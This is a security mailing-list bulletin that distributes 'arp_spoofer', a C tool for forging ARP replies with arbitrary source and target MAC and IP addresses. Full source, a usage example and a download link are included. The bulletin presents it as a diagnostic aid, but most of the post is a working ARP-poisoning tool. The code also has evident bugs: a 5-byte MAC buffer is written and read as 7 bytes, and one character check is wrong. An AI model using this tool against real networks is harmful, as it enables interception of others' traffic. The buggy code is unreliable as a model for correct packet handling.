The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
arp_spoofer - Full ARP Packets Manipulation
------------------------------------------------------------------------
SUMMARY
DETAILS
This program (coded in C using PF_PACKET sockets) allows full manipulation
of ARP packets, including specification of Source MAC/IP Addresses and
Destination MAC/IP Addresses.
This can be useful when diagnosing networking problems including
host/switch ARP Poisoning testing, and router testing.
Source code:
/*************************************************
* [ ARP SPOOFER ] created by phonix_04
*
* This is an arp spoofer, that allows users to
* specify both IP and MAC addresses of the
* packet.
*
* Contact:
* Email: phonix.04@gmail.com
*
*************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <features.h>
#include <netpacket/packet.h>
#include <net/ethernet.h>
#include <sys/ioctl.h>
#include <linux/sockios.h>
#include <linux/if.h>
typedef int SOCKET;
#define ROOT 0
#define TRUE 1
#define FALSE 0
#define ARG_COUNT 1+5
struct mac_address {
unsigned char hardware[5];
};
SOCKET create_socket(int root) {
SOCKET sd;
if (root == 1) {
if (geteuid() != ROOT) {
printf("Need root to run this prog\n");
exit(-1);
}
}
sd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
return sd;
}
void *create_packet(struct mac_address *mac_source, struct mac_address
*mac_target, char *ip_source, char *ip_target)
{
char *packet = (char *)malloc(60);
int x;
memset(packet, 0, 60);
for(x=0; x<=6; x++) {
packet[x] = *((char *)mac_target+x);
}
for(x=0; x<=6; x++) {
packet[6+x] = *((char *)mac_source+x);
}
*(unsigned short *)(packet+12) = (unsigned short)htons(0x0806);
*(unsigned short *)(packet+14) = (unsigned short)htons(1);
*(unsigned short *)(packet+16) = (unsigned short)htons(0x0800);
*(unsigned char *)(packet+18) = 6;
*(unsigned char *)(packet+19) = 4;
*(unsigned short *)(packet+20) = (unsigned short)htons(2);
for(x=0; x<=6; x++) {
packet[22+x] = *((char *)mac_source+x);
}
*(unsigned long *)(packet+28) = inet_addr(ip_source);
for(x=0; x<=6; x++) {
packet[32+x] = *((char *)mac_target+x);
}
*(unsigned long *)(packet+38) = inet_addr(ip_target);
return packet;
}
struct sockaddr_ll* create_interface_sockaddr(SOCKET sd, char *interface)
{
struct ifreq ifreq;
static struct sockaddr_ll sll;
memset(&sll, 0, sizeof(struct sockaddr_ll));
strncpy(ifreq.ifr_ifrn.ifrn_name, interface, IFNAMSIZ);
if (ioctl(sd, SIOCGIFINDEX, &ifreq) < 0) {
printf("Error Getting Interface Index\n");
exit(-1);
}
sll.sll_family = AF_PACKET;
sll.sll_ifindex = ifreq.ifr_ifru.ifru_ivalue;
return &sll;
}
void send_packet(SOCKET sd, void *packet, int size, char *interface) {
struct sockaddr_ll *sll;
sll = create_interface_sockaddr(sd, interface);
if (sendto(sd, packet, size, 0, (struct sockaddr *)sll, sizeof(struct
sockaddr_ll)) < 0) {
printf("Error Sending Packet\n");
exit(-1);
}
}
void convert_mac(const char *input, struct mac_address *output) {
int x, y;
char data[6*2];
memset(output, 0, sizeof(struct mac_address));
strncpy(data, input, 6*2);
for(x=0; x<=6*2; x++) {
if (data[x] >= 'a' && data[x] <= 'f') {
data[x] = data[x] - 0x20;
}
}
for(x=0, y=0; x<=6*2; x+=2, y++) {
if (data[x] >= 'A' && data[x] <= 'F') {
output->hardware[y] = ((data[x] - 55) * 0x10);
} else {
output->hardware[y] = ((data[x] - 0x30) * 0x10);
}
if (data[x+1] >= 'A' && data[x] <= 'F') {
output->hardware[y] |= (data[x+1] - 55);
} else {
output->hardware[y] |= (data[x+1] - 0x30);
}
}
}
void print_usage(char **args) {
char *app_name = *(char **)((char *)args+0);
printf("USAGE: %s INTERFACE MAC_SOURCE MAC_DEST IP_SOURCE IP_DEST\n",
app_name);
printf("EXAMPLE: %s eth0 000FFDA32EFA A33AD553AF6F 192.168.0.1
192.168.0.2\n", app_name);
}
void print_banner() {
printf("\n====[ARP SPOOFER ]=====================\n");
printf("===========[ CREATED BY PHONIX_04 ]====\n\n");
}
int main(int argc, char **argv) {
SOCKET sd;
void *packet;
struct mac_address mac_source, mac_dest;
print_banner();
if (argc != ARG_COUNT) {
print_usage(argv);
exit(-1);
}
convert_mac(argv[2], &mac_source);
convert_mac(argv[3], &mac_dest);
sd = create_socket(TRUE);
if (sd < 0) {
printf("Error Creating Socket\n");
}
packet = create_packet(&mac_source, &mac_dest, argv[4], argv[5]);
send_packet(sd, packet, 60, argv[1]);
free(packet);
printf("=======[ SUMMARY ]=====================\n");
printf(" Packet Sent Successfully\n");
printf(" Using Interface: %s\n", argv[1]);
printf(" Source Mac: %s\n", argv[2]);
printf(" Target Mac: %s\n", argv[3]);
printf(" Source IP: %s\n", argv[4]);
printf(" Dest IP: %s\n", argv[5]);
printf("========================================\n");
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:phonix.04@gmail.com>
phonix.04.
Download the tool:
<http://packetstormsecurity.org/UNIX/security/arp_spoofer.tar.gz>
http://packetstormsecurity.org/UNIX/security/arp_spoofer.tar.gz
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
